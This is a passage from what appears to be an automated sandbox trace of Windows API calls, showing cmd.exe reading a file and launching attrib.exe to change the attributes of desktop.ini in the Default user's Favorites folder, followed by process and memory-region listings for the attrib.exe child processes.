lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.842] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, 
lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.843] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.844] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.844] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: 
lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.844] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.844] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.867] FindClose (in: hFindFile=0x450820 | out: hFindFile=0x450820) returned 1 [0212.867] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0212.868] _close (_FileHandle=3) returned 0 [0212.868] GetConsoleTitleW (in: lpConsoleTitle=0x2ef400, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.868] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0212.868] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.868] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.868] FindClose (in: hFindFile=0x450820 | out: hFindFile=0x450820) returned 1 [0212.869] FindClose (in: hFindFile=0x450820 | out: hFindFile=0x450820) returned 1 [0212.869] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0212.869] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0212.869] GetConsoleTitleW (in: lpConsoleTitle=0x2ef194, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.869] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef01c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef0e4 | out: lpAttributeList=0x2ef01c, lpSize=0x2ef0e4) returned 1 [0212.869] 
UpdateProcThreadAttribute (in: lpAttributeList=0x2ef01c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef0dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef01c, lpPreviousValue=0x0) returned 1 [0212.869] GetStartupInfoW (in: lpStartupInfo=0x2eefd8 | out: lpStartupInfo=0x2eefd8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0212.869] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.869] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef078*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef0c4 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" ", lpProcessInformation=0x2ef0c4*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb48, dwThreadId=0x98c)) returned 1 [0212.870] CloseHandle (hObject=0x50) returned 1 [0212.871] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.871] GetEnvironmentStringsW () returned 0x452d20* [0212.871] FreeEnvironmentStringsW (penv=0x452d20) returned 1 [0212.871] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0212.932] 
GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2eefb8 | out: lpExitCode=0x2eefb8*=0x0) returned 1 [0212.932] CloseHandle (hObject=0x4c) returned 1 [0212.932] _vsnwprintf (in: _Buffer=0x2ef100, _BufferCount=0x13, _Format="%08X", _ArgList=0x2eefc4 | out: _Buffer="00000000") returned 8 [0212.932] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0212.932] GetEnvironmentStringsW () returned 0x452d20* [0212.932] FreeEnvironmentStringsW (penv=0x452d20) returned 1 [0212.932] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0212.932] GetEnvironmentStringsW () returned 0x452d20* [0212.932] FreeEnvironmentStringsW (penv=0x452d20) returned 1 [0212.932] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef01c | out: lpAttributeList=0x2ef01c) [0212.932] GetConsoleTitleW (in: lpConsoleTitle=0x2ef400, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.932] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0212.932] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.933] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.933] FindClose (in: hFindFile=0x450820 | out: hFindFile=0x450820) returned 1 [0212.933] FindClose (in: hFindFile=0x450820 | out: hFindFile=0x450820) returned 1 [0212.933] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0212.933] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0212.933] GetConsoleTitleW (in: lpConsoleTitle=0x2ef194, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.934] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef01c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef0e4 | out: 
lpAttributeList=0x2ef01c, lpSize=0x2ef0e4) returned 1 [0212.934] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef01c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef0dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef01c, lpPreviousValue=0x0) returned 1 [0212.934] GetStartupInfoW (in: lpStartupInfo=0x2eefd8 | out: lpStartupInfo=0x2eefd8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0212.934] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.934] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef078*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef0c4 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"", lpProcessInformation=0x2ef0c4*(hProcess=0x50, hThread=0x4c, dwProcessId=0x9f4, dwThreadId=0x888)) returned 1 [0212.935] CloseHandle (hObject=0x4c) returned 1 [0212.935] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.935] GetEnvironmentStringsW () returned 0x453760* [0212.935] FreeEnvironmentStringsW (penv=0x453760) returned 1 [0212.935] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 
[0213.261] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2eefb8 | out: lpExitCode=0x2eefb8*=0x0) returned 1 [0213.261] CloseHandle (hObject=0x50) returned 1 [0213.261] _vsnwprintf (in: _Buffer=0x2ef100, _BufferCount=0x13, _Format="%08X", _ArgList=0x2eefc4 | out: _Buffer="00000000") returned 8 [0213.261] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0213.261] GetEnvironmentStringsW () returned 0x453760* [0213.261] FreeEnvironmentStringsW (penv=0x453760) returned 1 [0213.261] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0213.262] GetEnvironmentStringsW () returned 0x453760* [0213.262] FreeEnvironmentStringsW (penv=0x453760) returned 1 [0213.262] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef01c | out: lpAttributeList=0x2ef01c) [0213.262] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.262] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.262] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.262] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0213.262] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.262] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0213.262] SetConsoleInputExeNameW () returned 0x1 [0213.262] GetConsoleOutputCP () returned 0x1b5 [0213.262] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.262] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.262] exit (_Code=0) Process: id = "521" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0xa7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "520" os_parent_pid = "0xa50" cmd_line = "attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = 
"CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31287 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31288 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31289 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31290 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 31291 start_va = 0x880000 end_va = 0x886fff entry_point = 0x880000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31292 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31293 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31294 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31295 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 31296 start_va = 
0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31297 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31298 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31299 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 31300 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31301 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 31302 start_va = 0x6e1e0000 end_va = 0x6e1fcfff entry_point = 0x6e1e0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31303 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31304 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31305 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31306 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = 
"\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31307 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31308 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31309 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31310 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31311 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31312 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31313 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31314 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 31315 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") 
Region: id = 31316 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 722 os_tid = 0xab0 Process: id = "522" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0xb48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "520" os_parent_pid = "0xa50" cmd_line = "attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31317 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31318 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31319 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31320 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 31321 start_va = 0xb50000 end_va = 0xb56fff entry_point = 0xb50000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31322 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = 
"ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31323 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31324 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31325 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 31326 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31327 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31328 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31329 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31330 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 31331 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 31332 start_va = 0x6dd20000 end_va = 0x6dd3cfff entry_point = 0x6dd20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31333 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31334 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31335 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31336 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31337 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31338 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31339 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31340 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31341 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31342 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 
region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31343 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31344 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 31345 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31346 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 723 os_tid = 0x98c Process: id = "523" image_name = 